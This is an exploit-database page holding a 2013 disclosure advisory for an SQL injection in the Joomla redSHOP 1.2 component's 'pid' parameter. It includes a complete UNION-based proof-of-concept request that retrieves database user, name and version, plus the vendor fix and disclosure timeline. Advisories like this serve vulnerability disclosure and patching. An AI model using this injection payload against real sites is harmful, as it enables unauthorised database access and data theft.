[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component redSHOP 1.2 SQL Injection Vulnerability

Author
Matias Fontanini
Risk
[
Security Risk High
]
0day-ID
0day-ID-21092
Category
web applications
Date add
09-08-2013
Platform
php
--------------------------------------------
Joomla! redSHOP component v1.2 SQL Injection
--------------------------------------------

== Description ==
- Product: Joomla! redSHOP component
- Product link: http://redcomponent.com/redcomponent/redshop
- Vendor: redcomponent
- Affected versions: version 1.2 is vulnerable. Other versions might
be affected as well.
- Vulnerability discovered by: Matias Fontanini

== Vulnerability ==
When using the "addtocompare" task, the component does not correctly
sanitize the "pid" parameter before using it to construct SQL queries,
making it vulnerable to SQL Injection attacks.

The following proof of concept request retrieves the database user,
name and version:

http://example.com/index.php?tmpl=component&option=com_redshop&view=product&task=addtocompare&pid=24%22%20and%201=0%20union%20select%201,2,3,4,5,6,7,8,concat_ws%280x203a20,%20user%28%29,%20database%28%29,%20version%28%29%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63%23&cmd=add&cid=20&sid=0.6886686905513422

== Solution ==
Upgrade the product to the 1.3 version.

== Report timeline ==
[2013-08-02] Vulnerability reported to vendor.
[2013-08-02] Developers answered back indicating that an update would
be released soon.
[2013-08-06] redSHOP 1.3 was released, which fixes the reported issue.
[2013-08-08] Public disclosure.

#  0day.today [2024-12-25]  #